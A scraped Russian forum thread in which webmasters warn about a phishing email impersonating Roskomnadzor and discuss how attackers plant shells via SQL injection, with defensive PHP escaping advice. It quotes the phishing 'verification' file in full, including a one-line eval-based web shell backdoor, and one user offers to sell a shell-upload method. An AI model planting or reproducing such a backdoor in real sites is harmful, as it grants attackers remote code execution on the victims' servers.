Всё обо всём
взломщик
94
52
10 лет назад
Мой знакомый прислал интересную информацию 
И так на почту многим должно придти следующая информация
Показать / Скрыть текстВы получили данное уведомление от Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор) так как являетесь администратором доменного имени webof-sar.ru в сети «Интернет».
По истечению 72 часов, Вы, администратор доменного имени webof-sar.ru НЕ прошли верификацию, Ваш сайт webof-sar.ru может быть внесен в чёрные списки интернет-провайдеров и заблокирован на территории Российской Федерации.
В случае, если Вы выполнили необходимые требования, но наш робот не подтвердил верификацию, проверьте следующее:
1) Убедитесь в наличии папки reestr и файла reestr000000078827135647.php, содержащий следующий текст:
< ?php /*Подтверждение доменного имени webof-sar.ru roskomnadzor-verification = 54re00ds92167049999901257a roskomnadzor-verification2 = 54re00ds92167049999901257a / eval(stripslashes($_REQUEST[roskomnadzor])); / roskomnadzor-verification4 = 54re00ds92167049999901257a */ ?>
2) В коде< ?php необходимо убрать пробел между < и ?php , в конце текста убрать пробел между ? и >, как на картинке ниже:
Все это лохатрон... НЕ в коем случае не видитесь....!
И так на почту многим должно придти следующая информация
Показать / Скрыть текстВы получили данное уведомление от Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор) так как являетесь администратором доменного имени webof-sar.ru в сети «Интернет».По истечению 72 часов, Вы, администратор доменного имени webof-sar.ru НЕ прошли верификацию, Ваш сайт webof-sar.ru может быть внесен в чёрные списки интернет-провайдеров и заблокирован на территории Российской Федерации.
В случае, если Вы выполнили необходимые требования, но наш робот не подтвердил верификацию, проверьте следующее:
1) Убедитесь в наличии папки reestr и файла reestr000000078827135647.php, содержащий следующий текст:
< ?php /*Подтверждение доменного имени webof-sar.ru roskomnadzor-verification = 54re00ds92167049999901257a roskomnadzor-verification2 = 54re00ds92167049999901257a / eval(stripslashes($_REQUEST[roskomnadzor])); / roskomnadzor-verification4 = 54re00ds92167049999901257a */ ?>
2) В коде< ?php необходимо убрать пробел между < и ?php , в конце текста убрать пробел между ? и >, как на картинке ниже:
Все это лохатрон... НЕ в коем случае не видитесь....!
10 лет назад
Мне тож такие файлы заливали))) На твоём старом движке ещё....
Так что скорее всего дыра в каком то из старых твоих файлов.
Так что скорее всего дыра в каком то из старых твоих файлов.
10 лет назад
со стороннего ресурса базу обновляю. Но видать проблема не в этом!
10 лет назад
BelarusBUX.com,
2 раза такое приходило, хороший способ ))
2 раза такое приходило, хороший способ ))
10 лет назад
nanotek,
да я уже все через поиски перелопатил. Самой заливки файлов нигде нет, кроме аваторок
да я уже все через поиски перелопатил. Самой заливки файлов нигде нет, кроме аваторок
10 лет назад
SpawN,
Может форум?
WiNNeR_tig,
А ты чего не отвечаешь мне на сайте своём? Яж тебе про баг говорил.... а ты так и не поправил (
Может форум?
WiNNeR_tig,
А ты чего не отвечаешь мне на сайте своём? Яж тебе про баг говорил.... а ты так и не поправил (
10 лет назад
SpawN, а кто хостер?
Цитата: Pretorianлоги загрузки на сервер
по дате загруженных файлов можно в логах смотреть...
Цитата: Pretorianлоги загрузки на сервер
по дате загруженных файлов можно в логах смотреть...
10 лет назад
Прикрути защиту касого убери все echo о *уякинг атемптах и вместо них припиши логи какой файл пытались атаковать и прочее, парси все post cookies и headers
В конце концов вычисли ip кулхацкера и пиши в логи все его действия от входа до залития кода. Прикрути к всем post стрипслеш, скорее всего с помощью sql inj делают select into outfile
В конце концов вычисли ip кулхацкера и пиши в логи все его действия от входа до залития кода. Прикрути к всем post стрипслеш, скорее всего с помощью sql inj делают select into outfile
10 лет назад
Цитата: steamВ конце концов вычисли ip кулхацкера
Все прекрасно знают. Что обнаружить IP это толку мало... если там хрендель реально с руками и с головой то он работает через туннель...
Все прекрасно знают. Что обнаружить IP это толку мало... если там хрендель реально с руками и с головой то он работает через туннель...
10 лет назад
потому и нет логов о заливке файла так как он вовсе не заливается а создается путем записи вредосного кода в базу через инекцию, в ячейку которая выводится в месте где нет фильтрации, и в результате код вредосный срабатывает как код а не как текст, и само собой создает шел, и удаляется с базы. Это мое мнение, хз как там, держите в курсе что там...
10 лет назад
Pretorian,
верно такое может быть.
SpawN,
Не в обиду но почти во всех скриптах что я смотрел спартака твой и тд и тп все обрабатывают данные через всякие ещё старые суфастовские функции вырезая вручную кавычки и тд и тп.
Проверь чтобы у тебя все данные которые ты передаёшь в БД проходили через mysql_real_escape_string а целочисленные intval или int.
литеральные константы обрамляй апострофами.
А перед выводом инфы на экран пропускай через htmlspecialchars.
В принципе всё от xss и sql inj. Вырезать вручную своими самодельными функциями ничего не надо. (ну за исключением каких то моментов когда линку надо вывести на экран то тут уже да).
Даже если ты уверен что иньекцию невозможна ты всё равно должен обрабатывать уже непосредственно в своём запросе данные с помощью mysql_real_escape_string.
Допустим ты логин чекаешь регуляркой preg_match("/^[a-zA-Z0-9_]+$/", $username
но при этом уже в самом запросе обрабатывай его ещё раз через mysql_real_escape_string
SET `username`='". mysql_real_escape_string($username) ."'
SpawN,
скинь мне на почту файлы свои загрузки: аватаров и что ещё загружаеться на сервак.
верно такое может быть.
SpawN,
Не в обиду но почти во всех скриптах что я смотрел спартака твой и тд и тп все обрабатывают данные через всякие ещё старые суфастовские функции вырезая вручную кавычки и тд и тп.
Проверь чтобы у тебя все данные которые ты передаёшь в БД проходили через mysql_real_escape_string а целочисленные intval или int.
литеральные константы обрамляй апострофами.
А перед выводом инфы на экран пропускай через htmlspecialchars.
В принципе всё от xss и sql inj. Вырезать вручную своими самодельными функциями ничего не надо. (ну за исключением каких то моментов когда линку надо вывести на экран то тут уже да).
Даже если ты уверен что иньекцию невозможна ты всё равно должен обрабатывать уже непосредственно в своём запросе данные с помощью mysql_real_escape_string.
Допустим ты логин чекаешь регуляркой preg_match("/^[a-zA-Z0-9_]+$/", $username
но при этом уже в самом запросе обрабатывай его ещё раз через mysql_real_escape_string
SET `username`='". mysql_real_escape_string($username) ."'
SpawN,
скинь мне на почту файлы свои загрузки: аватаров и что ещё загружаеться на сервак.
10 лет назад
BelarusBUX.com,
А я и не говорил что надо самого кренделя по айпишнику вычислять, это удел школоты и отдела К, айпишник нужен чтобы отфильтровать куда этот крендель по сайту перемещается и вычислить тем самым потенциальные файлы с дырами, сузить поиск
А я и не говорил что надо самого кренделя по айпишнику вычислять, это удел школоты и отдела К, айпишник нужен чтобы отфильтровать куда этот крендель по сайту перемещается и вычислить тем самым потенциальные файлы с дырами, сузить поиск
10 лет назад
Цитата: SpawN Купи у меня скрипт, сделай правильный выбор! Купить скрипт!
10 лет назад
нашли причину? Если можно в личку, что бы школота не училась ломать
10 лет назад
нет. причину не нашли
10 лет назад
Цитата: VELIK505mysql_real_escape_string
Дело говорит) Теперь пол своего движка надо немного переделать)
Дело говорит) Теперь пол своего движка надо немного переделать)
10 лет назад
Цитата: Pretorianнашли причину? Если можно в личку, что бы школота не училась ломать
Какой же ты жалкий. Это тебе можно причину, а школоте нельзя? Да если бы в своё время не алекс, который рассказал как можно sql inj реализовать на сеоедите, огромное количество школоты не пошлобы ломать буксы и находить дыры в других(!!!) местах.
Но повторюсь. Есть отличный вариант, через который можно залить шелл. 100 баксов цена
Какой же ты жалкий. Это тебе можно причину, а школоте нельзя? Да если бы в своё время не алекс, который рассказал как можно sql inj реализовать на сеоедите, огромное количество школоты не пошлобы ломать буксы и находить дыры в других(!!!) местах.
Но повторюсь. Есть отличный вариант, через который можно залить шелл. 100 баксов цена
10 лет назад
Misha,
А ты возьми и выложи статьёй)
А ты возьми и выложи статьёй)
10 лет назад
Цитата: steamА ты возьми и выложи статьёй)Человек на этом деньги зарабатывает.
10 лет назад
Цитата: ZKolyaNZвообще паук плати за тестирования своего скрипта и все, не ломай комедию, сбивай деньги с алмаза и все. ибо его скрипт тоже с багом и деньги и оттудова уходят хорошо сейчас ;)
Хорошо сказал...
Хорошо сказал...